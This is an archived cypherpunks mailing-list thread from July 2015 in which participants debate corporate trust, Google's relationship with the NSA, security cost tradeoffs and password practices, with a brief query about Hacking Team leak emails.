01:42, Zenaan Harkness wrote: > On 7/18/15, Stephen D. Williams wrote: >> I feel perfectly confident that Google is going to >> protect their billions in income and valuation by being very >> careful with avoiding abusing their data or users in any strong sense. > > Wellp, see here now sonny ... a little bit of gennel abuse now, that's > ok now ya here me son? Just a little slap if she says no 'll bring her > right into line, and short or long of that, these here 4 gennel silky > cuffs - tie em reel gennel like, and them users aint ever gonna > notice. Once they's hog tied in a nice soft and golden cage of online > service, they don't know what data been inserted and sold no where. > > ... > > You listenin ta me son?!! > > . > > Stop picken your nose! > -- Scientific Director, IndieBio EU Programme Now running in Cork, Ireland May->July Learn more at indie.bio and follow along! Twitter: @onetruecathal Phone: +353876363185 miniLock: JjmYYngs7akLZUjkvFkuYdsZ3PyPHSZRBKNm6qTYKZfAM peerio.com: cathalgarvey From guninski at guninski.com Mon Jul 20 04:19:16 2015 From: guninski at guninski.com (Georgi Guninski) Date: Mon, 20 Jul 2015 14:19:16 +0300 Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?] In-Reply-To: <1765623.m5QBTiy03s@lapuntu> References: <1765623.m5QBTiy03s@lapuntu> Message-ID: <20150720111916.GA2493@sivokote.iziade.m$> On Sun, Jul 19, 2015 at 08:54:37PM +0200, rysiek wrote: > Dnia czwartek, 9 lipca 2015 17:19:11 coderman pisze: > > https://wikileaks.org/hackingteam/emails/emailid/144932 > > There's a bunch more of these, accessible via the very nice search interface: > https://wikileaks.org/hackingteam/emails/?q=%22msz.gov.pl%22&mfrom=&mto=&title=¬itle=&date=&nofrom=¬o=&count=50&sort=0#searchresult > > By the way, does anybody know what this list is about? Customers? Blacklisted > people? Targets? > Are they selling exploit services/solutions or just spyware? From sdw at lig.net Mon Jul 20 14:53:59 2015 From: sdw at lig.net (Stephen D. Williams) Date: Mon, 20 Jul 2015 14:53:59 -0700 Subject: an ominous comment In-Reply-To: <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> Message-ID: <55AD6DF7.50903@lig.net> I hold multitudes. I am in one thread totally cypherpunk, and have been for a very long time. There are innumerable ways to compromise and be compromised for all kinds of good and mostly bad reasons. Perfect protection is tough for in many ways and we should keep striving to get closer to that ideal security stance. On the other hand, life is a balance. I probably shouldn't have tried to make the point here, but it is something a security professional should understand well: The right amount of security should be moderated by the tradeoff of costs vs. overhead vs. maximizing benefit vs. minimizing loss. Security stances change over time and aren't necessarily accurately reflected by paranoid absolutism. An example along these lines that I like to keep in mind: (I really did avoid writing down passwords anywhere for a long time. And I still don't carry them with me. If I did, they wouldn't be plaintext.) https://www.schneier.com/blog/archives/2005/06/write_down_your.html > > > Write Down Your Password > > Microsoft's Jesper Johansson urged > people to write down their passwords. > > This is good advice, and I've been saying it for years. > > Simply, people can no longer remember passwords good enough to reliably defend against dictionary attacks, and are much more > secure if they choose a password too complicated to remember and then write it down. We're all good at securing small pieces of > paper. I recommend that people write their passwords down on a small piece of paper, and keep it with their other valuable small > pieces of paper: in their wallet. > It is terrible that some companies have been too eager to share information. They may or may not have believed whatever safeguards were in place, or not cared, etc. I'm sure a high pressure meeting with an FBI crew who are strongly playing the terrorism angle is persuasive, as it should be, up to a point. And companies holding your data can actually look at that data for business purposes, although how they use it is somewhat bounded by privacy laws (however incomplete), not making private things public, unfair business practices, etc. My point was that the existence of large, valuable services that depend on a lot of trust is, or should be to a sane entity, an even stronger incentive to behave than the patchwork of laws. Past oversharing, then embarrassment and public abuse, coupled with product impacts as they lose sensitive customers, has almost certainly caused a cleanup of those attitudes. I'd be interested in the actual policy right now, although I doubt they are going to be too explicit. I suspect that it also varies heavily by corporate culture. Every day, you are somewhat at the mercy of dozens and perhaps thousands of people who could cause you pain, suffering, or death if they were so inclined. There are many in the government, schools, employer personnel departments, medical and insurance companies, etc. The people driving around you, stopped at a light while you cross the street, making your food, they all have access and the ability to inflict misery on you. You have to trust someone to some extent. The question is who you trust, how incentivized they and the people / organization around them protects you, whether wrongs will be limited, corrected, and righted or not. For a long time, as a contractor at the peak of their heyday, I had access to AOL's entire user database, complete with name, address, full credit card info, phone numbers, etc. I could have also snooped on their Buddylists, their person-to-person video (Instant Images), and a lot more. There was zero chance that I would abuse any of that. sdw On 7/20/15 2:07 PM, Juan wrote: > > cypherpunk : > > https://www.wikileaks.org/Op-ed-Google-and-the-NSA-Who-s.html > > "Google and the NSA: Who’s holding the ‘shit-bag’ now?" > > > Not-cypherpunk-at-all : > > >> 2015-07-19 2:22 GMT+09:00 Stephen D. Williams : >> >> I feel perfectly confident that Google is going to protect their >> billions in income and valuation by being very careful with >> avoiding abusing their data or users in any strong sense. > > > > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 5708 bytes Desc: not available URL: From alfiej at fastmail.fm Sun Jul 19 23:25:31 2015 From: alfiej at fastmail.fm (Alfie John) Date: Mon, 20 Jul 2015 16:25:31 +1000 Subject: In-Reply-To: References: <55AC5B26.8050100@pobox.com> Message-ID: <1437373531.2379710.327896465.7A3C60EA@webmail.messagingengine.com> On Mon, Jul 20, 2015, at 03:31 PM, coderman wrote: > joined the twitters recently, Handle? > does this taper off? or just a constant stream of noise... They are mostly astroturfers, pinging every so often. Click report and move on. Alfie -- Alfie John alfiej at fastmail.fm From admin at pilobilus.net Mon Jul 20 14:47:38 2015 From: admin at pilobilus.net (Steve Kinney) Date: Mon, 20 Jul 2015 17:47:38 -0400 Subject: an ominous comment In-Reply-To: <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> Message-ID: <55AD6C7A.5070102@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 07/20/2015 05:07 PM, Juan wrote: > > > cypherpunk : > > https://www.wikileaks.org/Op-ed-Google-and-the-NSA-Who-s.html > > "Google and the NSA: Who’s holding the ‘shit-bag’ now?" > > > Not-cypherpunk-at-all : > > >> 2015-07-19 2:22 GMT+09:00 Stephen D. Williams : >> >> I feel perfectly confident that Google is going to protect >> their billions in income and valuation by being very careful >> with avoiding abusing their data or users in any strong >> sense. There was a bit of controversy over the relationship between Google and the NSA back when Google was brand new, because the NSA sent engineers over to Google to help them design their server farms. Other companies very properly complained because they were not getting any such free tech support from Uncle Sam. Abusing all your users equally at a scale that makes the abuse a normal environmental condition, produces maximum gains in income and valuation for the enterprise. Also this: https://medium.com/insurge-intelligence/how-the-cia-made-google-e836 451a959e And this, https://medium.com/insurge-intelligence/why-google-made-the-nsa-2a80 584c9c1 Etc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBAgAGBQJVrWx4AAoJEDZ0Gg87KR0LXdAQAOmWlUnx0zVy3dfBRn70STcR trd5MuE+hoEVLg1D5p6DWj1SPltoQ60fKp+Xxy7/U33LkYSl39PJ67M/piNAgtfC NUJr0iIGT9Y1ILJZUpfQMKNSoAhj+0r6uEtOnxez5XPgGksq6NGB/o/ImQ+vrZm9 UILf/pQ2fu5mlbYYJIzagAm+mUtKcr9Zmd2HWeYqs7+aFHWJiGAMj7iy1JImA0bL naC6vha4Pfp8d7KoKkooii9NMuuikAghRw5IG6AiRo2bGzm9UDRYSrmhV375gXnD raC2dy6AqsF3pbU+szyHc/CVXuQKDAWvux0UDjnM+NFk2cKZiQeUsSAzCy0uAWS6 VYOfZK2jRvNdpndtIsu3ibjfZLwfgSX9hfD8nEqtXk0Z8Vi25RGpML1oX0e93HV9 XNJ9NBzPRhiBYCjjX9Krf1Ij7gkH5oTHaepd/KUwlJF9SB7a6KZplQJPz5QI4rYP ve9ICjvqDmAAGkQJ7S07g2o6JdlYg009GvoCZYv8bZQbndjlP/HQ6f0HVgrwy6qJ TYh0U07LPjIzZIePioYoCB3JcUKIjdGv3fATKrkVF4ukHFD183AFVEQ3s4KGCZJd G0jcJhLyNv5vQHQ3GIxf6judP7PkLMHHf9jpK0lgrS/8Cw2QoLpg2WGvAhrRw1pS V6733J34ok0fLHbuxLsN =oxdC -----END PGP SIGNATURE----- From juan.g71 at gmail.com Mon Jul 20 14:07:03 2015 From: juan.g71 at gmail.com (Juan) Date: Mon, 20 Jul 2015 18:07:03 -0300 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> Message-ID: <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> cypherpunk : https://www.wikileaks.org/Op-ed-Google-and-the-NSA-Who-s.html "Google and the NSA: Who’s holding the ‘shit-bag’ now?" Not-cypherpunk-at-all : > 2015-07-19 2:22 GMT+09:00 Stephen D. Williams : > > I feel perfectly confident that Google is going to protect their > billions in income and valuation by being very careful with > avoiding abusing their data or users in any strong sense. From admin at pilobilus.net Mon Jul 20 16:40:52 2015 From: admin at pilobilus.net (Steve Kinney) Date: Mon, 20 Jul 2015 19:40:52 -0400 Subject: an ominous comment In-Reply-To: <55AD6DF7.50903@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> Message-ID: <55AD8704.8070104@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 07/20/2015 05:53 PM, Stephen D. Williams wrote: > I hold multitudes. I am in one thread totally cypherpunk, and > have been for a very long time. There are innumerable ways to > compromise and be compromised for all kinds of good and mostly > bad reasons. Perfect protection is tough for in many ways and > we should keep striving to get closer to that ideal security > stance. > > On the other hand, life is a balance. I probably shouldn't > have tried to make the point here, but it is something a > security professional should understand well: The right amount > of security should be moderated by the tradeoff of costs vs. > overhead vs. maximizing benefit vs. minimizing loss. Security > stances change over time and aren't necessarily accurately > reflected by paranoid absolutism. Right you are, in "security" context is everything. My take on the Cypherpunk Way is, start with design concepts for maximum security (!= absolute security), then trim the security constraints back just enough to permit useful work to be done on a cost effective basis. This is vs. industry standard security, where one starts with no security considerations at all, then adds just enough security to cover the largest perceived (!= actual) threats from potential adversaries. Compare UNIX style OS architecture to MS style. :) > An example along these lines that I like to keep in mind: (I > really did avoid writing down passwords anywhere for a long > time. And I still don't carry them with me. If I did, they > wouldn't be plaintext.) > > https://www.schneier.com/blog/archives/2005/06/write_down_your.htm l I'm > a big fan of password management, as a special case in the category of "A failed data backup may cost more than a successful break-in." Lots of luck getting "normal" users to make and use more than two weak passwords, though. :o/ Steve -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBAgAGBQJVrYcCAAoJEDZ0Gg87KR0Ly3YP/iRBCK0a5DksVS2VAQm4dXr+ hCK5woYAsYA5nbaS8XUjQFOHJz6yRU4iMRf8K6AFWG1MkNDv6OLz6G5lGtl7LFIH iNnrqedH6Im2y0GZdKHCjNDL3TpHwE7pXKrMPs6LQrcOzEMmXADN6NaMBR3+ng9y pVk8BvGwX9O7f9aq5OxpTPpS2GH+Rz5YVxURNMF/XlygxEDi0E1YqOi8m6WQLlOl UmZlgc1jVlfTfxrgB1E4VcdDvvoe1rxmx40y/ztmv51y3d4c9riLTPoRuuJS0+TX 0Ha6x3rQOEgAHLQUpk92e+q6cTGa+UaEqxv/sYG9dZtjQyDsoC7DvsdPjnhYPoOC Cxbdy4jEpNlGJ4gDCKmvq91e2pB8HK9OP7QwFTyHcBbFlq8ObjUwK6gtqMGiibWF 48Pll65tqr6UhMc4Xa+Ma9Zk5jjl2EziVUbVnf0dsCC7oFcksP5Yvsdz4cnEKTN4 9t6syo4fNVfmdMc5BHzWH+i7mtiBc/fsvP+O3pYEJ3TcsH/qSyt/JMjaiw0JHNUz f0axAQAA223xeuBdjtQwR64qfwNlHAlKMekMwXgHCVAmsYm3jWwnW7BsLa16ISvz X/r7qYRj8ikZrYCny676JUEOYQ7etzdfYbphWy2vBOfw/C+ZseIHG5JvTVBklhzL uwaJ+pffatAm/eAZu5Xz =+kaz -----END PGP SIGNATURE----- From sdw at lig.net Mon Jul 20 19:54:05 2015 From: sdw at lig.net (Stephen D. Williams) Date: Mon, 20 Jul 2015 19:54:05 -0700 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> Message-ID: <55ADB44D.5080402@lig.net> On 7/20/15 4:56 PM, Zenaan Harkness wrote: > On 7/20/15, Stephen D. Williams wrote: >> On the other hand, life is a balance. > True. I'm thinking individuals here. > >> I probably shouldn't have tried to >> make the point here, but it is something a security >> professional should understand well: The right amount of security >> should be moderated by the tradeoff of costs vs. overhead vs. >> maximizing benefit vs. minimizing loss. > Corporations are bound to their economic imperative to make such trade > offs. This is the heart of their sociopathic nature. This is the part > of corporations/ companies which needs, somehow, to change in order to > get this world on a better track. > > ... >> It is terrible that some companies have been too eager to share information. >> They may or may not have believed whatever safeguards >> were in place, or not cared, etc. I'm sure a high pressure meeting with an >> FBI crew who are strongly playing the terrorism angle is >> persuasive, as it should be, up to a point. > Here's the kind of talk that looks like a hole freshly dug. > > Perhaps if there is an actual existential threat to someone's life or > some building (let's please stop using the T word), then "high > pressure persuasion" would be adequate for a court order anyway. As it > should be - up to the point of a subpoena, summons and/ or order to > perform or act - to handle the actual problem. > > You seem though to be normalising behaviours and approaches and "high > pressure persuasion" tactics by government departments, in a > generalised way. You might not be intending the things you imply/ say, You're making an unqualified assumption about my unqualified qualifier "up to a point"... > but don't be surprised when such positions are mocked or ridiculed. > Don't take such blow back as personal at all though - it's the > "normalisation of bad" and "plainly wrong/ evil" which is being > attacked for the bullshit it is. Feel free. I totally mock and rail about it too. I can see several sides to this, and I've been on enough "sides" of these problems, at least in some weak sense, to have some model of decision making by people in those roles. Poor decisions are understandable until there are enough cases, noticed and confronted, to make the right path clear. We're getting a lot of those lately. EFF, SPLC, ACLU, and others, sometimes including commercial entities, are providing an invaluable service of evolving both the law and internal commercial and government policy. Hacking the system cleverly and deliberately is one of the cooler forms of hacking. >> And companies holding your data >> can actually look at that data for business purposes, > Perhaps try something this instead: "And for-profit therefore > sociopathic-by-nature companies do massively collect your metadata AND > your personal information, with or without your consent, and are well > leaked and reported to use and abuse all your data both within and > beyond the law, beyond your expectations, and beyond what many people > consider ethical." A few quibbles: for-profit is sociopathic-by-default perhaps, although even there you are assuming some socioeconomic system. You're also glossing over whether and when consent is an issue. People in public places sometimes believe that others need consent to take their picture; generally not true. Is it rude to take your picture and does rudeness matter? That depends. "Beyond your expectations" is also problematic: How could any possible expectation ever be said to be adhered to? Perhaps "generally accepted fair use as defined by EFF" or something (if there is such a thing) might be reasonable. What is the definition of "many people"? If you use language that can never be satisfied in any reliable way, you can't really complain that an entity isn't satisfying it. > > See what we did there? We made it personal, giving a slight hope to > the uninitiated to realise something they did not realise before. We Education is always good. Don't infect others with pathological paranoia, but a healthy understanding of risks and exposures is always good. > highlighted some foundations (for profit being inherently Not inherently. Social, economic, legal, contractual, and other cultural systems allow, disallow, guide, and control people in their interactions. The US, for instance, has always been a place where there were many unwritten rules of operating in business. Some have run roughshod over those, sometimes reaping unjust rewards and/or changing what is acceptable, but there are always things that could be done that just aren't. Further, a particular entity could impose upon itself, by charter, culture, or customer agreement, a more stringent stance than others. There could be mechanisms that audit or otherwise control this. You get what you optimize for. If you have a default corporation controlled by weak, shallow leaders and driven by shallow, blind Wall Street numbers, then the result is likely to be sociopathic. On the other hand, however imperfectly or incompletely, certain companies have a founder-driven culture of a far more empathic nature than this default, whether they be different or have a stated desire to not be evil. Both of those companies largely care about users in some strong sense, much unlike certain other highly and chronically annoying entities. > sociopathic). We reminded the reader that their consent is often not > obtained (yes, we can argue about implied consent, the point is we're > edumacating). We make the assertion that companies actually abuse all > that data (whatever "abuse" might mean), just in case someone missed > the memo. One person's use is another person's abuse. People should be aware. > > With all this, we are also implying that this abuse is wrong. Abuse is wrong, use may not be. Sometimes depends on where you stand. Some types don't have agreement. Plenty of people hate the idea of automated ad filtering based on the content of email or chat or other activity. There are things that could go wrong with that if it gets to a human or is gamed, but properly done anonymously, it can be fine: I'd rather get timely ads I may care about than the much larger set of uninteresting dreck. I actually suggested doing exactly this with AOL chatrooms in about 1996. This is a good example of good education vs. bad education: If you say "This could be misused or leaked in a way that could be a problem if a company isn't careful, and here is a scenario..., and here is how that could be handled better..." that's fine, especially if a company can indicate the level of care & security they're currently employing. If you say: "Google is reading your email, sending it to every company that wants to buy it for a few cents!" that's disingenuous at best and dangerous to certain people's mental state at worst. > > Your version sounds like you are -trying- to normalise the wrong, > justify the bad, and 'accept the new messed up world order as best we > can'. We hear enough of that from others. And I saw NO to that abuse! > Give me justification for abuse, at your peril! I was mainly talking about making realistic decisions without a value statement for current practices, which we are all going to have different opinions on since they aren't public. We should have some taxonomy of the nature of those abuses, with consensus lines drawn as to what we all find acceptable or not acceptable, why, and what mechanisms best resolve the issue. > > >> although how they use it is somewhat bounded by privacy laws (however >> incomplete), not making private things public, unfair business >> practices, etc. My point was that the existence of large, valuable services >> that depend on a lot of trust is, or should be to a > "should be" trustworthy? Some are not at certain points, or all are not at some points, or only mine is as far as I know. Take your pick. > They're companies. You've missed the bloody memo. And a very bloody > memo the corporate record is, for decades and across industries! Have you noticed the difference in nature of various companies over time? > >> sane entity, an even stronger incentive to behave than the patchwork >> of laws. > You're not grokking the incentive. It's profit. And it's more than an > incentive, profit is the foundational company-constitutional > imperative for companies (funny that). > > This is why companies can NOT be trusted. You seem to be missing this > basic point. Do you own a company? Of course; it may not be worth anything, but I do actual work. You don't? You're not doing your taxes properly if not... ;-) Who CAN be trusted? At some level, no one, but we've already established that in the real world, you generally have to trust people all the time. Are you sure you are applying your distrust criteria in a comprehensive and rational way? >> Past oversharing, then embarrassment and public >> abuse, coupled with product impacts as they lose sensitive customers, has >> almost certainly caused a cleanup of those attitudes. I'd >> be interested in the actual policy right now, although I doubt they are >> going to be too explicit. I suspect that it also varies >> heavily by corporate culture. > Some companies start with good policy, and good public stance, most > significantly in this conversation, Google itself - "do no evil". They > don't say that any more. They can't. Did you ever wonder why they > stopped saying that? They pretty much still do. And it is silly to say they can't. They are a relatively giant company. Mistakes happen. What mistakes are they making now? https://www.google.com/about/company/philosophy/ You can make money without doing evil. > >> Every day, you are somewhat at the mercy of dozens and perhaps thousands >> of people who could cause you pain, suffering, or death if >> they were so inclined. There are many in the government, schools, employer >> personnel departments, medical and insurance companies, >> etc. The people driving around you, stopped at a light while you cross the >> street, making your food, they all have access and the >> ability to inflict misery on you. You have to trust someone to some extent. > Trust is a relevant foundation to community/ society, sure. > > But now you've segued into personal. Which is a good place at times, > an effective place. It's more tangible for people. > > But here we were talking about companies. I would ordinarily presume > your trust formula is different for companies that it is for actual, > you know, humans. > > I suggest not overloading corporate rights, corporate trust, with > human rights, human trust. Not particularly useful in our context. All companies that I know about are filled with people. They may be sheeple a little too often (I have permanently fired ATT Mobile (formerly Cingular) for refusing to issue a refund to my son when they screwed up "because the policy prevents us".), but it is personal at some level. You are trusting that the Comcast installer is not a murderer, that the banker isn't stealing from you, and that the well-paid Google engineer has better things to do than to eavesdrop on you. >> The question is who you trust, how incentivized they >> and the people / organization around them protects you, whether wrongs will >> be limited, corrected, and righted or not. > A rational approach is warranted for sure. > > Companies, and in most cases humans working for them, are > predominantly incentivized by money. Yesterday I read an article on Whether all are, or even a predominant amount are, is questionable. Many people care about customers, their career, mission, etc. Money is only an issue occasionally. > the Great Wall of China. Incredible vision, so many centuries of > building. But when it came down to the time it was 'needed', due to > there being only so many sentries, and so far spread out, and the > sentries paid so little, when the marauding Mongols wanted in, to do > some marauding, they just bribed a sentry or two. Apparently same with > the Europeans in more recent times. So, incentivized people were, > secure, wall was not. The biggest security theater. > > I think the great wall may have been useful psychologically though... > to encourage a mindset of unity in the people within. > > >> For a long time, as a contractor at the peak of their heyday, I had access >> to AOL's entire user database, complete with name, >> address, full credit card info, phone numbers, etc. I could have also >> snooped on their Buddylists, their person-to-person video >> (Instant Images), and a lot more. There was zero chance that I would abuse >> any of that. > Your ethics are admirable. I share your personal intentions. I don't > trust companies though, except to plunder markets to the maximum > profit possible. There are some who have acted that way, for sure. I have my black list. Others try. They deserve a little credit, and help when possible. > > Zenaan > >> sdw sdw >> >> On 7/20/15 2:07 PM, Juan wrote: >>> cypherpunk : >>> >>> https://www.wikileaks.org/Op-ed-Google-and-the-NSA-Who-s.html >>> >>> "Google and the NSA: Who’s holding the ‘shit-bag’ now?" >>> >>> >>> Not-cypherpunk-at-all : >>> >>> >>>> 2015-07-19 2:22 GMT+09:00 Stephen D. Williams : >>>> >>>> I feel perfectly confident that Google is going to protect their >>>> billions in income and valuation by being very careful with >>>> avoiding abusing their data or users in any strong sense. -- Stephen D. Williams sdw at lig.net stephendwilliams at gmail.com LinkedIn: http://sdw.st/in V:650-450-UNIX (8649) V:866.SDW.UNIX V:703.371.9362 F:703.995.0407 AIM:sdw Skype:StephenDWilliams Yahoo:sdwlignet Resume: http://sdw.st/gres Personal: http://sdw.st facebook.com/sdwlig twitter.com/scienteer -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 19594 bytes Desc: not available URL: From sdw at lig.net Mon Jul 20 21:36:57 2015 From: sdw at lig.net (Stephen D. Williams) Date: Mon, 20 Jul 2015 21:36:57 -0700 Subject: an ominous comment In-Reply-To: <55adc555.0ae88c0a.425f.3132@mx.google.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> Message-ID: <55ADCC69.1060207@lig.net> On 7/20/15 9:07 PM, Juan wrote: > > Hey. *Now* I get it. > > This mailing list has a lot of tor-tards who are apologists of > the pentagon's propaganda and spying efforts. Are you saying that the Pentagon is never good or useful? Nor are any of their spying efforts? > > It has people who say that the NSA does good things (coderman) They don't? > > It has apologists of the US marines. You have never benefited in any way from the US marines? The footprint there is pretty large. You think they are somehow fundamentally evil when they don't determine their goals or rules of engagement? Their job is to be a bad ass tool, the proverbial big stick. It is someone else's job to decide how to use that tool. Marines don't kill people, politicians using Marines kill people. Err, something like that. > > It has high ranking scumbags from the CIA. There are high ranking scumbags from the CIA here? Interesting. Is everyone from the CIA scumbags by definition? > It has commie 'anarchists' who are offended by (and would love > to silence) people who badmouth the marines' apologists. Eh? > > And NOW it also has a google and cloud apologist. Welcome > Stephen =) You are yet another reason to distrust the FLOSS movement and > its bloatware. FLOSS has bloatware? Are you using the same meaning as the rest of us? What's your favorite alternative? Someone explaining bits of the world are not necessarily an apologist for those bits. Trying to correct or moderate viewpoint extremism (see what I did there?) with more balance, or logic, or other viewpoints isn't necessarily being an apologist either; that's the kind of accusation that usually comes from someone slinging not fully supported barbs. I do think Google is better than some other companies, but that's pretty weak on the apologist scale; I was more making a statement about a class of companies and how they should rationally act with respect to security. > J. > What's your alternative to all of these things? If you really are into security in any sense, you should be able to explain what security exposures moderating or eliminating those entities would cause and what you would advocate to replace them. I'm offended in various ways by a lot of what happened in the past, often in organizations like DOJ, FBI, etc. that should have known better. I would even say that a lot of government employees and contractors seem to have got away with a lot of things they shouldn't have. But that doesn't mean that any of those organizations are fundamentally evil and aren't almost completely staffed by intelligent, respectable people. Anyway, if you're still in the rebelling against authority stage, fine, have fun. Good luck with that. In the US, government wise, the people are the authority, their own authority in essence, it just may take a long time for that to play out in a given area. In some ways, this is also true for companies, with some nuance. sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 4435 bytes Desc: not available URL: From shelley at misanthropia.org Mon Jul 20 23:08:56 2015 From: shelley at misanthropia.org (Shelley) Date: Mon, 20 Jul 2015 23:08:56 -0700 Subject: an ominous comment In-Reply-To: <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> Message-ID: <20150721060840.679F7C0001C@frontend1.nyi.internal> On July 20, 2015 2:17:54 PM Juan wrote: > > cypherpunk : > > https://www.wikileaks.org/Op-ed-Google-and-the-NSA-Who-s.html > > "Google and the NSA: Who’s holding the ‘shit-bag’ now?" > > > Not-cypherpunk-at-all : > > > > 2015-07-19 2:22 GMT+09:00 Stephen D. Williams : > > > > I feel perfectly confident that Google is going to protect their > > billions in income and valuation by being very careful with > > avoiding abusing their data or users in any strong sense. > Yes Juan, thank you for posting this link! This isn't even new, we just got proof in that Stratfor email dump. Anyone who can read that and want to have anything to do with google in any capacity is insane. Read the whole linked conversation, if you haven't. It's quite disturbing and enlightening. This is a good link to send around to the sHillary bots, too. Not that it'll make a difference. It's Giant Douche and Turd Sandwich all over again, and if voting really changed anything they'd make it illegal. -S From zen at freedbms.net Mon Jul 20 16:56:30 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Mon, 20 Jul 2015 23:56:30 +0000 Subject: an ominous comment In-Reply-To: <55AD6DF7.50903@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> Message-ID: On 7/20/15, Stephen D. Williams wrote: > On the other hand, life is a balance. True. I'm thinking individuals here. > I probably shouldn't have tried to > make the point here, but it is something a security > professional should understand well: The right amount of security > should be moderated by the tradeoff of costs vs. overhead vs. > maximizing benefit vs. minimizing loss. Corporations are bound to their economic imperative to make such trade offs. This is the heart of their sociopathic nature. This is the part of corporations/ companies which needs, somehow, to change in order to get this world on a better track. ... > It is terrible that some companies have been too eager to share information. > They may or may not have believed whatever safeguards > were in place, or not cared, etc. I'm sure a high pressure meeting with an > FBI crew who are strongly playing the terrorism angle is > persuasive, as it should be, up to a point. Here's the kind of talk that looks like a hole freshly dug. Perhaps if there is an actual existential threat to someone's life or some building (let's please stop using the T word), then "high pressure persuasion" would be adequate for a court order anyway. As it should be - up to the point of a subpoena, summons and/ or order to perform or act - to handle the actual problem. You seem though to be normalising behaviours and approaches and "high pressure persuasion" tactics by government departments, in a generalised way. You might not be intending the things you imply/ say, but don't be surprised when such positions are mocked or ridiculed. Don't take such blow back as personal at all though - it's the "normalisation of bad" and "plainly wrong/ evil" which is being attacked for the bullshit it is. > And companies holding your data > can actually look at that data for business purposes, Perhaps try something this instead: "And for-profit therefore sociopathic-by-nature companies do massively collect your metadata AND your personal information, with or without your consent, and are well leaked and reported to use and abuse all your data both within and beyond the law, beyond your expectations, and beyond what many people consider ethical." See what we did there? We made it personal, giving a slight hope to the uninitiated to realise something they did not realise before. We highlighted some foundations (for profit being inherently sociopathic). We reminded the reader that their consent is often not obtained (yes, we can argue about implied consent, the point is we're edumacating). We make the assertion that companies actually abuse all that data (whatever "abuse" might mean), just in case someone missed the memo. With all this, we are also implying that this abuse is wrong. Your version sounds like you are -trying- to normalise the wrong, justify the bad, and 'accept the new messed up world order as best we can'. We hear enough of that from others. And I saw NO to that abuse! Give me justification for abuse, at your peril! > although how they use it is somewhat bounded by privacy laws (however > incomplete), not making private things public, unfair business > practices, etc. My point was that the existence of large, valuable services > that depend on a lot of trust is, or should be to a "should be" trustworthy? They're companies. You've missed the bloody memo. And a very bloody memo the corporate record is, for decades and across industries! > sane entity, an even stronger incentive to behave than the patchwork > of laws. You're not grokking the incentive. It's profit. And it's more than an incentive, profit is the foundational company-constitutional imperative for companies (funny that). This is why companies can NOT be trusted. You seem to be missing this basic point. Do you own a company? > Past oversharing, then embarrassment and public > abuse, coupled with product impacts as they lose sensitive customers, has > almost certainly caused a cleanup of those attitudes. I'd > be interested in the actual policy right now, although I doubt they are > going to be too explicit. I suspect that it also varies > heavily by corporate culture. Some companies start with good policy, and good public stance, most significantly in this conversation, Google itself - "do no evil". They don't say that any more. They can't. Did you ever wonder why they stopped saying that? > Every day, you are somewhat at the mercy of dozens and perhaps thousands > of people who could cause you pain, suffering, or death if > they were so inclined. There are many in the government, schools, employer > personnel departments, medical and insurance companies, > etc. The people driving around you, stopped at a light while you cross the > street, making your food, they all have access and the > ability to inflict misery on you. You have to trust someone to some extent. Trust is a relevant foundation to community/ society, sure. But now you've segued into personal. Which is a good place at times, an effective place. It's more tangible for people. But here we were talking about companies. I would ordinarily presume your trust formula is different for companies that it is for actual, you know, humans. I suggest not overloading corporate rights, corporate trust, with human rights, human trust. Not particularly useful in our context. > The question is who you trust, how incentivized they > and the people / organization around them protects you, whether wrongs will > be limited, corrected, and righted or not. A rational approach is warranted for sure. Companies, and in most cases humans working for them, are predominantly incentivized by money. Yesterday I read an article on the Great Wall of China. Incredible vision, so many centuries of building. But when it came down to the time it was 'needed', due to there being only so many 